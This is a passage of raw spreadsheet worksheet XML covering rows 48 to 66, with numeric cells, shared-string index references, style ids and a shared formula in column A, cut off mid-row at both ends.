      <c r="I48" s="6">
        <v>2068.0</v>
      </c>
      <c r="J48" s="13" t="s">
        <v>113</v>
      </c>
      <c r="K48" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L48" s="13" t="s">
        <v>113</v>
      </c>
      <c r="M48" s="13" t="s">
        <v>113</v>
      </c>
      <c r="N48" s="13" t="s">
        <v>212</v>
      </c>
      <c r="O48" s="4" t="s">
        <v>220</v>
      </c>
      <c r="P48" s="4" t="s">
        <v>221</v>
      </c>
      <c r="Q48" s="6">
        <v>183528.0</v>
      </c>
      <c r="R48" s="8"/>
      <c r="S48" s="8"/>
      <c r="T48" s="8"/>
      <c r="U48" s="8"/>
      <c r="V48" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W48" s="2" t="s">
        <v>215</v>
      </c>
      <c r="X48" s="6">
        <v>6.0</v>
      </c>
      <c r="Y48" s="6">
        <v>12.0</v>
      </c>
      <c r="Z48" s="6">
        <v>0.0</v>
      </c>
      <c r="AA48" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB48" s="8"/>
      <c r="AC48" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE48" s="8"/>
      <c r="AF48" s="14"/>
    </row>
    <row r="49">
      <c r="A49" s="6">
        <f t="shared" si="1"/>
        <v>0.3927140721</v>
      </c>
      <c r="B49" s="6">
        <v>7.0917662E7</v>
      </c>
      <c r="C49" s="6">
        <v>1.0</v>
      </c>
      <c r="D49" s="8"/>
      <c r="E49" s="8"/>
      <c r="F49" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G49" s="8"/>
      <c r="H49" s="6">
        <v>2.0</v>
      </c>
      <c r="I49" s="6">
        <v>328.0</v>
      </c>
      <c r="J49" s="13" t="s">
        <v>95</v>
      </c>
      <c r="K49" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L49" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M49" s="13" t="s">
        <v>95</v>
      </c>
      <c r="N49" s="10" t="s">
        <v>47</v>
      </c>
      <c r="O49" s="4" t="s">
        <v>222</v>
      </c>
      <c r="P49" s="4" t="s">
        <v>223</v>
      </c>
      <c r="Q49" s="6">
        <v>1.3014547E7</v>
      </c>
      <c r="R49" s="8"/>
      <c r="S49" s="8"/>
      <c r="T49" s="8"/>
      <c r="U49" s="8"/>
      <c r="V49" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W49" s="2" t="s">
        <v>224</v>
      </c>
      <c r="X49" s="6">
        <v>0.0</v>
      </c>
      <c r="Y49" s="6">
        <v>0.0</v>
      </c>
      <c r="Z49" s="8"/>
      <c r="AA49" s="8"/>
      <c r="AB49" s="8"/>
      <c r="AC49" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE49" s="8"/>
      <c r="AF49" s="14"/>
    </row>
    <row r="50">
      <c r="A50" s="6">
        <f t="shared" si="1"/>
        <v>0.9632898231</v>
      </c>
      <c r="B50" s="6">
        <v>2.8923133E7</v>
      </c>
      <c r="C50" s="6">
        <v>1.0</v>
      </c>
      <c r="D50" s="8"/>
      <c r="E50" s="8"/>
      <c r="F50" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G50" s="8"/>
      <c r="H50" s="6">
        <v>0.0</v>
      </c>
      <c r="I50" s="6">
        <v>454.0</v>
      </c>
      <c r="J50" s="13" t="s">
        <v>95</v>
      </c>
      <c r="K50" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L50" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M50" s="18" t="s">
        <v>95</v>
      </c>
      <c r="N50" s="13" t="s">
        <v>225</v>
      </c>
      <c r="O50" s="4" t="s">
        <v>226</v>
      </c>
      <c r="P50" s="4" t="s">
        <v>227</v>
      </c>
      <c r="Q50" s="6">
        <v>4216979.0</v>
      </c>
      <c r="R50" s="7"/>
      <c r="S50" s="6">
        <v>4216979.0</v>
      </c>
      <c r="T50" s="7"/>
      <c r="U50" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V50" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W50" s="2" t="s">
        <v>228</v>
      </c>
      <c r="X50" s="6">
        <v>1.0</v>
      </c>
      <c r="Y50" s="6">
        <v>5.0</v>
      </c>
      <c r="Z50" s="7"/>
      <c r="AA50" s="7"/>
      <c r="AB50" s="7"/>
      <c r="AC50" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE50" s="8"/>
      <c r="AF50" s="15"/>
    </row>
    <row r="51">
      <c r="A51" s="6">
        <f t="shared" si="1"/>
        <v>0.2078275332</v>
      </c>
      <c r="B51" s="6">
        <v>4.1500124E7</v>
      </c>
      <c r="C51" s="6">
        <v>1.0</v>
      </c>
      <c r="D51" s="6">
        <v>4.1500201E7</v>
      </c>
      <c r="E51" s="8"/>
      <c r="F51" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G51" s="8"/>
      <c r="H51" s="6">
        <v>0.0</v>
      </c>
      <c r="I51" s="6">
        <v>167.0</v>
      </c>
      <c r="J51" s="13" t="s">
        <v>95</v>
      </c>
      <c r="K51" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L51" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M51" s="18" t="s">
        <v>95</v>
      </c>
      <c r="N51" s="13" t="s">
        <v>229</v>
      </c>
      <c r="O51" s="4" t="s">
        <v>230</v>
      </c>
      <c r="P51" s="4" t="s">
        <v>231</v>
      </c>
      <c r="Q51" s="6">
        <v>5807433.0</v>
      </c>
      <c r="R51" s="7"/>
      <c r="S51" s="6">
        <v>5807433.0</v>
      </c>
      <c r="T51" s="7"/>
      <c r="U51" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V51" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W51" s="2" t="s">
        <v>232</v>
      </c>
      <c r="X51" s="6">
        <v>1.0</v>
      </c>
      <c r="Y51" s="6">
        <v>1.0</v>
      </c>
      <c r="Z51" s="7"/>
      <c r="AA51" s="7"/>
      <c r="AB51" s="7"/>
      <c r="AC51" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE51" s="8"/>
      <c r="AF51" s="15"/>
    </row>
    <row r="52">
      <c r="A52" s="6">
        <f t="shared" si="1"/>
        <v>0.2657848265</v>
      </c>
      <c r="B52" s="6">
        <v>6837991.0</v>
      </c>
      <c r="C52" s="6">
        <v>1.0</v>
      </c>
      <c r="D52" s="8"/>
      <c r="E52" s="8"/>
      <c r="F52" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G52" s="8"/>
      <c r="H52" s="6">
        <v>0.0</v>
      </c>
      <c r="I52" s="6">
        <v>1357.0</v>
      </c>
      <c r="J52" s="13" t="s">
        <v>95</v>
      </c>
      <c r="K52" s="13" t="s">
        <v>95</v>
      </c>
      <c r="L52" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M52" s="13" t="s">
        <v>160</v>
      </c>
      <c r="N52" s="13" t="s">
        <v>229</v>
      </c>
      <c r="O52" s="4" t="s">
        <v>233</v>
      </c>
      <c r="P52" s="4" t="s">
        <v>234</v>
      </c>
      <c r="Q52" s="6">
        <v>372640.0</v>
      </c>
      <c r="R52" s="8"/>
      <c r="S52" s="8"/>
      <c r="T52" s="8"/>
      <c r="U52" s="8"/>
      <c r="V52" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W52" s="2" t="s">
        <v>235</v>
      </c>
      <c r="X52" s="6">
        <v>0.0</v>
      </c>
      <c r="Y52" s="6">
        <v>2.0</v>
      </c>
      <c r="Z52" s="6">
        <v>0.0</v>
      </c>
      <c r="AA52" s="8"/>
      <c r="AB52" s="8"/>
      <c r="AC52" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE52" s="8"/>
      <c r="AF52" s="14"/>
    </row>
    <row r="53">
      <c r="A53" s="6">
        <f t="shared" si="1"/>
        <v>0.4510283483</v>
      </c>
      <c r="B53" s="6">
        <v>6.8844939E7</v>
      </c>
      <c r="C53" s="6">
        <v>1.0</v>
      </c>
      <c r="D53" s="6">
        <v>6.8845497E7</v>
      </c>
      <c r="E53" s="8"/>
      <c r="F53" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G53" s="8"/>
      <c r="H53" s="6">
        <v>0.0</v>
      </c>
      <c r="I53" s="6">
        <v>241.0</v>
      </c>
      <c r="J53" s="13" t="s">
        <v>95</v>
      </c>
      <c r="K53" s="13" t="s">
        <v>95</v>
      </c>
      <c r="L53" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M53" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N53" s="13" t="s">
        <v>236</v>
      </c>
      <c r="O53" s="4" t="s">
        <v>237</v>
      </c>
      <c r="P53" s="4" t="s">
        <v>238</v>
      </c>
      <c r="Q53" s="6">
        <v>1.6703687E7</v>
      </c>
      <c r="R53" s="7"/>
      <c r="S53" s="7"/>
      <c r="T53" s="7"/>
      <c r="U53" s="8"/>
      <c r="V53" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W53" s="2" t="s">
        <v>239</v>
      </c>
      <c r="X53" s="6">
        <v>1.0</v>
      </c>
      <c r="Y53" s="6">
        <v>0.0</v>
      </c>
      <c r="Z53" s="7"/>
      <c r="AA53" s="7"/>
      <c r="AB53" s="7"/>
      <c r="AC53" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE53" s="8"/>
      <c r="AF53" s="15"/>
    </row>
    <row r="54">
      <c r="A54" s="6">
        <f t="shared" si="1"/>
        <v>0.478513814</v>
      </c>
      <c r="B54" s="6">
        <v>3.606613E7</v>
      </c>
      <c r="C54" s="6">
        <v>1.0</v>
      </c>
      <c r="D54" s="8"/>
      <c r="E54" s="8"/>
      <c r="F54" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G54" s="8"/>
      <c r="H54" s="6">
        <v>0.0</v>
      </c>
      <c r="I54" s="6">
        <v>541.0</v>
      </c>
      <c r="J54" s="13" t="s">
        <v>240</v>
      </c>
      <c r="K54" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L54" s="10" t="s">
        <v>240</v>
      </c>
      <c r="M54" s="13" t="s">
        <v>240</v>
      </c>
      <c r="N54" s="13" t="s">
        <v>241</v>
      </c>
      <c r="O54" s="4" t="s">
        <v>242</v>
      </c>
      <c r="P54" s="4" t="s">
        <v>243</v>
      </c>
      <c r="Q54" s="6">
        <v>5105164.0</v>
      </c>
      <c r="R54" s="7"/>
      <c r="S54" s="7"/>
      <c r="T54" s="7"/>
      <c r="U54" s="8"/>
      <c r="V54" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W54" s="2" t="s">
        <v>244</v>
      </c>
      <c r="X54" s="6">
        <v>0.0</v>
      </c>
      <c r="Y54" s="6">
        <v>2.0</v>
      </c>
      <c r="Z54" s="7"/>
      <c r="AA54" s="7"/>
      <c r="AB54" s="7"/>
      <c r="AC54" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE54" s="8"/>
      <c r="AF54" s="15"/>
    </row>
    <row r="55">
      <c r="A55" s="6">
        <f t="shared" si="1"/>
        <v>0.4012902957</v>
      </c>
      <c r="B55" s="6">
        <v>3.1396521E7</v>
      </c>
      <c r="C55" s="6">
        <v>1.0</v>
      </c>
      <c r="D55" s="8"/>
      <c r="E55" s="8"/>
      <c r="F55" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G55" s="8"/>
      <c r="H55" s="6">
        <v>1.0</v>
      </c>
      <c r="I55" s="6">
        <v>238.0</v>
      </c>
      <c r="J55" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K55" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L55" s="10" t="s">
        <v>245</v>
      </c>
      <c r="M55" s="10" t="s">
        <v>245</v>
      </c>
      <c r="N55" s="13" t="s">
        <v>246</v>
      </c>
      <c r="O55" s="4" t="s">
        <v>247</v>
      </c>
      <c r="P55" s="4" t="s">
        <v>248</v>
      </c>
      <c r="Q55" s="6">
        <v>3606470.0</v>
      </c>
      <c r="R55" s="8"/>
      <c r="S55" s="6">
        <v>3606470.0</v>
      </c>
      <c r="T55" s="8"/>
      <c r="U55" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V55" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W55" s="2" t="s">
        <v>249</v>
      </c>
      <c r="X55" s="6">
        <v>0.0</v>
      </c>
      <c r="Y55" s="6">
        <v>4.0</v>
      </c>
      <c r="Z55" s="8"/>
      <c r="AA55" s="8"/>
      <c r="AB55" s="8"/>
      <c r="AC55" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE55" s="8"/>
      <c r="AF55" s="14"/>
    </row>
    <row r="56">
      <c r="A56" s="6">
        <f t="shared" si="1"/>
        <v>0.7352694803</v>
      </c>
      <c r="B56" s="6">
        <v>5.0029476E7</v>
      </c>
      <c r="C56" s="6">
        <v>1.0</v>
      </c>
      <c r="D56" s="8"/>
      <c r="E56" s="8"/>
      <c r="F56" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G56" s="8"/>
      <c r="H56" s="6">
        <v>1.0</v>
      </c>
      <c r="I56" s="6">
        <v>173.0</v>
      </c>
      <c r="J56" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K56" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L56" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M56" s="13" t="s">
        <v>245</v>
      </c>
      <c r="N56" s="13" t="s">
        <v>250</v>
      </c>
      <c r="O56" s="4" t="s">
        <v>251</v>
      </c>
      <c r="P56" s="4" t="s">
        <v>252</v>
      </c>
      <c r="Q56" s="6">
        <v>2579287.0</v>
      </c>
      <c r="R56" s="8"/>
      <c r="S56" s="6">
        <v>6083222.0</v>
      </c>
      <c r="T56" s="8"/>
      <c r="U56" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V56" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W56" s="2" t="s">
        <v>253</v>
      </c>
      <c r="X56" s="6">
        <v>0.0</v>
      </c>
      <c r="Y56" s="6">
        <v>5.0</v>
      </c>
      <c r="Z56" s="6">
        <v>0.0</v>
      </c>
      <c r="AA56" s="8"/>
      <c r="AB56" s="8"/>
      <c r="AC56" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE56" s="8"/>
      <c r="AF56" s="14"/>
    </row>
    <row r="57">
      <c r="A57" s="6">
        <f t="shared" si="1"/>
        <v>0.928355722</v>
      </c>
      <c r="B57" s="6">
        <v>6.0520008E7</v>
      </c>
      <c r="C57" s="6">
        <v>1.0</v>
      </c>
      <c r="D57" s="6">
        <v>6.052193E7</v>
      </c>
      <c r="E57" s="8"/>
      <c r="F57" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G57" s="8"/>
      <c r="H57" s="6">
        <v>0.0</v>
      </c>
      <c r="I57" s="6">
        <v>70.0</v>
      </c>
      <c r="J57" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K57" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L57" s="10" t="s">
        <v>160</v>
      </c>
      <c r="M57" s="13" t="s">
        <v>245</v>
      </c>
      <c r="N57" s="13" t="s">
        <v>254</v>
      </c>
      <c r="O57" s="4" t="s">
        <v>255</v>
      </c>
      <c r="P57" s="4" t="s">
        <v>256</v>
      </c>
      <c r="Q57" s="6">
        <v>696173.0</v>
      </c>
      <c r="R57" s="8"/>
      <c r="S57" s="8"/>
      <c r="T57" s="8"/>
      <c r="U57" s="8"/>
      <c r="V57" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W57" s="2" t="s">
        <v>257</v>
      </c>
      <c r="X57" s="6">
        <v>1.0</v>
      </c>
      <c r="Y57" s="6">
        <v>0.0</v>
      </c>
      <c r="Z57" s="8"/>
      <c r="AA57" s="8"/>
      <c r="AB57" s="8"/>
      <c r="AC57" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE57" s="8"/>
      <c r="AF57" s="14"/>
    </row>
    <row r="58">
      <c r="A58" s="6">
        <f t="shared" si="1"/>
        <v>0.1223757152</v>
      </c>
      <c r="B58" s="6">
        <v>4.5813792E7</v>
      </c>
      <c r="C58" s="6">
        <v>1.0</v>
      </c>
      <c r="D58" s="6">
        <v>4.5816682E7</v>
      </c>
      <c r="E58" s="8"/>
      <c r="F58" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G58" s="8"/>
      <c r="H58" s="6">
        <v>-4.0</v>
      </c>
      <c r="I58" s="6">
        <v>932.0</v>
      </c>
      <c r="J58" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K58" s="17"/>
      <c r="L58" s="17"/>
      <c r="M58" s="23" t="s">
        <v>245</v>
      </c>
      <c r="N58" s="17"/>
      <c r="O58" s="4" t="s">
        <v>258</v>
      </c>
      <c r="P58" s="4" t="s">
        <v>259</v>
      </c>
      <c r="Q58" s="6">
        <v>5593094.0</v>
      </c>
      <c r="R58" s="7"/>
      <c r="S58" s="6">
        <v>-1.0</v>
      </c>
      <c r="T58" s="7"/>
      <c r="U58" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V58" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W58" s="2" t="s">
        <v>260</v>
      </c>
      <c r="X58" s="6">
        <v>1.0</v>
      </c>
      <c r="Y58" s="6">
        <v>2.0</v>
      </c>
      <c r="Z58" s="7"/>
      <c r="AA58" s="7"/>
      <c r="AB58" s="7"/>
      <c r="AC58" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE58" s="8"/>
      <c r="AF58" s="15"/>
    </row>
    <row r="59">
      <c r="A59" s="6">
        <f t="shared" si="1"/>
        <v>0.01337186497</v>
      </c>
      <c r="B59" s="6">
        <v>1.3651797E7</v>
      </c>
      <c r="C59" s="6">
        <v>1.0</v>
      </c>
      <c r="D59" s="6">
        <v>1.3651837E7</v>
      </c>
      <c r="E59" s="8"/>
      <c r="F59" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G59" s="8"/>
      <c r="H59" s="6">
        <v>0.0</v>
      </c>
      <c r="I59" s="6">
        <v>1881.0</v>
      </c>
      <c r="J59" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K59" s="20"/>
      <c r="L59" s="20"/>
      <c r="M59" s="23" t="s">
        <v>31</v>
      </c>
      <c r="N59" s="20"/>
      <c r="O59" s="4" t="s">
        <v>261</v>
      </c>
      <c r="P59" s="4" t="s">
        <v>262</v>
      </c>
      <c r="Q59" s="6">
        <v>1690113.0</v>
      </c>
      <c r="R59" s="8"/>
      <c r="S59" s="8"/>
      <c r="T59" s="8"/>
      <c r="U59" s="8"/>
      <c r="V59" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W59" s="2" t="s">
        <v>263</v>
      </c>
      <c r="X59" s="6">
        <v>1.0</v>
      </c>
      <c r="Y59" s="6">
        <v>0.0</v>
      </c>
      <c r="Z59" s="8"/>
      <c r="AA59" s="8"/>
      <c r="AB59" s="8"/>
      <c r="AC59" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE59" s="8"/>
      <c r="AF59" s="14"/>
    </row>
    <row r="60">
      <c r="A60" s="6">
        <f t="shared" si="1"/>
        <v>0.1956301357</v>
      </c>
      <c r="B60" s="6">
        <v>5.807297E7</v>
      </c>
      <c r="C60" s="6">
        <v>1.0</v>
      </c>
      <c r="D60" s="8"/>
      <c r="E60" s="8"/>
      <c r="F60" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G60" s="8"/>
      <c r="H60" s="6">
        <v>-1.0</v>
      </c>
      <c r="I60" s="6">
        <v>685.0</v>
      </c>
      <c r="J60" s="13" t="s">
        <v>245</v>
      </c>
      <c r="K60" s="17"/>
      <c r="L60" s="17"/>
      <c r="M60" s="23" t="s">
        <v>245</v>
      </c>
      <c r="N60" s="17"/>
      <c r="O60" s="4" t="s">
        <v>264</v>
      </c>
      <c r="P60" s="4" t="s">
        <v>265</v>
      </c>
      <c r="Q60" s="6">
        <v>2352611.0</v>
      </c>
      <c r="R60" s="7"/>
      <c r="S60" s="6">
        <v>2352611.0</v>
      </c>
      <c r="T60" s="7"/>
      <c r="U60" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V60" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W60" s="2" t="s">
        <v>266</v>
      </c>
      <c r="X60" s="6">
        <v>1.0</v>
      </c>
      <c r="Y60" s="6">
        <v>0.0</v>
      </c>
      <c r="Z60" s="6">
        <v>0.0</v>
      </c>
      <c r="AA60" s="7"/>
      <c r="AB60" s="7"/>
      <c r="AC60" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE60" s="8"/>
      <c r="AF60" s="15"/>
    </row>
    <row r="61">
      <c r="A61" s="6">
        <f t="shared" si="1"/>
        <v>0.6562797712</v>
      </c>
      <c r="B61" s="6">
        <v>2.3588659E7</v>
      </c>
      <c r="C61" s="6">
        <v>1.0</v>
      </c>
      <c r="D61" s="8"/>
      <c r="E61" s="8"/>
      <c r="F61" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G61" s="8"/>
      <c r="H61" s="6">
        <v>-3.0</v>
      </c>
      <c r="I61" s="6">
        <v>1155.0</v>
      </c>
      <c r="J61" s="13" t="s">
        <v>240</v>
      </c>
      <c r="K61" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L61" s="3" t="s">
        <v>267</v>
      </c>
      <c r="M61" s="10" t="s">
        <v>267</v>
      </c>
      <c r="N61" s="13" t="s">
        <v>268</v>
      </c>
      <c r="O61" s="4" t="s">
        <v>269</v>
      </c>
      <c r="P61" s="4" t="s">
        <v>270</v>
      </c>
      <c r="Q61" s="6">
        <v>3624701.0</v>
      </c>
      <c r="R61" s="8"/>
      <c r="S61" s="6">
        <v>3366929.0</v>
      </c>
      <c r="T61" s="8"/>
      <c r="U61" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V61" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W61" s="2" t="s">
        <v>271</v>
      </c>
      <c r="X61" s="6">
        <v>1.0</v>
      </c>
      <c r="Y61" s="6">
        <v>6.0</v>
      </c>
      <c r="Z61" s="8"/>
      <c r="AA61" s="8"/>
      <c r="AB61" s="8"/>
      <c r="AC61" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AD61" s="12"/>
      <c r="AE61" s="2" t="s">
        <v>272</v>
      </c>
      <c r="AF61" s="5"/>
    </row>
    <row r="62">
      <c r="A62" s="6">
        <f t="shared" si="1"/>
        <v>0.0370473413</v>
      </c>
      <c r="B62" s="6">
        <v>4.1972851E7</v>
      </c>
      <c r="C62" s="6">
        <v>1.0</v>
      </c>
      <c r="D62" s="8"/>
      <c r="E62" s="8"/>
      <c r="F62" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G62" s="8"/>
      <c r="H62" s="6">
        <v>0.0</v>
      </c>
      <c r="I62" s="6">
        <v>228.0</v>
      </c>
      <c r="J62" s="20"/>
      <c r="K62" s="20"/>
      <c r="L62" s="20"/>
      <c r="M62" s="20"/>
      <c r="N62" s="20"/>
      <c r="O62" s="4" t="s">
        <v>273</v>
      </c>
      <c r="P62" s="4" t="s">
        <v>274</v>
      </c>
      <c r="Q62" s="6">
        <v>5388370.0</v>
      </c>
      <c r="R62" s="8"/>
      <c r="S62" s="6">
        <v>3687463.0</v>
      </c>
      <c r="T62" s="8"/>
      <c r="U62" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V62" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W62" s="2" t="s">
        <v>275</v>
      </c>
      <c r="X62" s="6">
        <v>0.0</v>
      </c>
      <c r="Y62" s="6">
        <v>2.0</v>
      </c>
      <c r="Z62" s="8"/>
      <c r="AA62" s="8"/>
      <c r="AB62" s="8"/>
      <c r="AC62" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE62" s="8"/>
      <c r="AF62" s="14"/>
    </row>
    <row r="63">
      <c r="A63" s="6">
        <f t="shared" si="1"/>
        <v>0.9463442701</v>
      </c>
      <c r="B63" s="6">
        <v>3077661.0</v>
      </c>
      <c r="C63" s="6">
        <v>1.0</v>
      </c>
      <c r="D63" s="6">
        <v>3080841.0</v>
      </c>
      <c r="E63" s="8"/>
      <c r="F63" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G63" s="8"/>
      <c r="H63" s="6">
        <v>9.0</v>
      </c>
      <c r="I63" s="6">
        <v>2147.0</v>
      </c>
      <c r="J63" s="20"/>
      <c r="K63" s="20"/>
      <c r="L63" s="20"/>
      <c r="M63" s="20"/>
      <c r="N63" s="20"/>
      <c r="O63" s="4" t="s">
        <v>276</v>
      </c>
      <c r="P63" s="4" t="s">
        <v>277</v>
      </c>
      <c r="Q63" s="6">
        <v>89771.0</v>
      </c>
      <c r="R63" s="8"/>
      <c r="S63" s="6">
        <v>183528.0</v>
      </c>
      <c r="T63" s="8"/>
      <c r="U63" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V63" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W63" s="2" t="s">
        <v>278</v>
      </c>
      <c r="X63" s="6">
        <v>4.0</v>
      </c>
      <c r="Y63" s="6">
        <v>6.0</v>
      </c>
      <c r="Z63" s="6">
        <v>0.0</v>
      </c>
      <c r="AA63" s="8"/>
      <c r="AB63" s="8"/>
      <c r="AC63" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE63" s="8"/>
      <c r="AF63" s="14"/>
    </row>
    <row r="64">
      <c r="A64" s="6">
        <f t="shared" si="1"/>
        <v>0.4265070602</v>
      </c>
      <c r="B64" s="6">
        <v>7.1029015E7</v>
      </c>
      <c r="C64" s="6">
        <v>1.0</v>
      </c>
      <c r="D64" s="6">
        <v>7.1034325E7</v>
      </c>
      <c r="E64" s="8"/>
      <c r="F64" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G64" s="8"/>
      <c r="H64" s="6">
        <v>-1.0</v>
      </c>
      <c r="I64" s="6">
        <v>129.0</v>
      </c>
      <c r="J64" s="20"/>
      <c r="K64" s="20"/>
      <c r="L64" s="20"/>
      <c r="M64" s="20"/>
      <c r="N64" s="20"/>
      <c r="O64" s="4" t="s">
        <v>279</v>
      </c>
      <c r="P64" s="4" t="s">
        <v>280</v>
      </c>
      <c r="Q64" s="6">
        <v>6842365.0</v>
      </c>
      <c r="R64" s="8"/>
      <c r="S64" s="6">
        <v>6842365.0</v>
      </c>
      <c r="T64" s="8"/>
      <c r="U64" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V64" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W64" s="2" t="s">
        <v>281</v>
      </c>
      <c r="X64" s="6">
        <v>2.0</v>
      </c>
      <c r="Y64" s="6">
        <v>2.0</v>
      </c>
      <c r="Z64" s="8"/>
      <c r="AA64" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB64" s="8"/>
      <c r="AC64" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE64" s="8"/>
      <c r="AF64" s="14"/>
    </row>
    <row r="65">
      <c r="A65" s="6">
        <f t="shared" si="1"/>
        <v>0.4479805022</v>
      </c>
      <c r="B65" s="6">
        <v>3.3159478E7</v>
      </c>
      <c r="C65" s="6">
        <v>1.0</v>
      </c>
      <c r="D65" s="8"/>
      <c r="E65" s="8"/>
      <c r="F65" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G65" s="8"/>
      <c r="H65" s="6">
        <v>0.0</v>
      </c>
      <c r="I65" s="6">
        <v>270.0</v>
      </c>
      <c r="J65" s="17"/>
      <c r="K65" s="17"/>
      <c r="L65" s="17"/>
      <c r="M65" s="17"/>
      <c r="N65" s="17"/>
      <c r="O65" s="4" t="s">
        <v>282</v>
      </c>
      <c r="P65" s="4" t="s">
        <v>283</v>
      </c>
      <c r="Q65" s="6">
        <v>5451629.0</v>
      </c>
      <c r="R65" s="7"/>
      <c r="S65" s="7"/>
      <c r="T65" s="7"/>
      <c r="U65" s="8"/>
      <c r="V65" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W65" s="2" t="s">
        <v>284</v>
      </c>
      <c r="X65" s="6">
        <v>0.0</v>
      </c>
      <c r="Y65" s="6">
        <v>2.0</v>
      </c>
      <c r="Z65" s="7"/>
      <c r="AA65" s="7"/>
      <c r="AB65" s="7"/>
      <c r="AC65" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE65" s="8"/>
      <c r="AF65" s="15"/>
    </row>
    <row r="66">
      <c r="A66" s="6">
        <f t="shared" si="1"/>
        <v>0.1218111669</v>
      </c>
      <c r="B66" s="6">
        <v>2.7814481E7</v>
      </c>
      <c r="C66" s="24">
        <v>1.0</v>
      </c>
      <c r="D66" s="24">
        <v>2.8185281E7</v>
      </c>
      <c r="E66" s="25"/>
      <c r="F66" s="26" t="s">
        <v>30</v>
      </c>
      <c r="G66" s="25"/>
      <c r="H66" s="24">
        <v>0.0</v>
      </c>
      <c r="I66" s="24">
        <v>3472.0</v>
      </c>
      <c r="J66" s="20"/>
      <c r="K66" s="20"/>
      <c r="L66" s="20"/>
      <c r="M66" s="13"/>
      <c r="N66" s="20"/>
      <c r="O66" s="4" t="s">
        <v>285</v>
      </c>
      <c r="P66" s="4" t="s">
        <v>286</v>
      </c>
      <c r="Q66" s="6">
        <v>4427784.0</v>
      </c>
      <c r="R66" s="8"/>
      <c r="S66" s="6">
        <v>1244328.0</v>
      </c>
      <c r="T66" s="8"/>
      <c r="U66" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V66" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W66" s="2" t="s">
        <v>287</v>
      </c>
      <c r="X66" s="6">
        <v>2.0</v>
      </c>
      <c r="Y66" s="6">
        <v>0.0</v>
      </c>
      <c r="Z66" s="8"/>
      <c r="AA66" s="8"/>
      <c r="AB66" s="8"/>
      <c r="AC66" s="2" t="s">
        <v>37</v>
      </c>
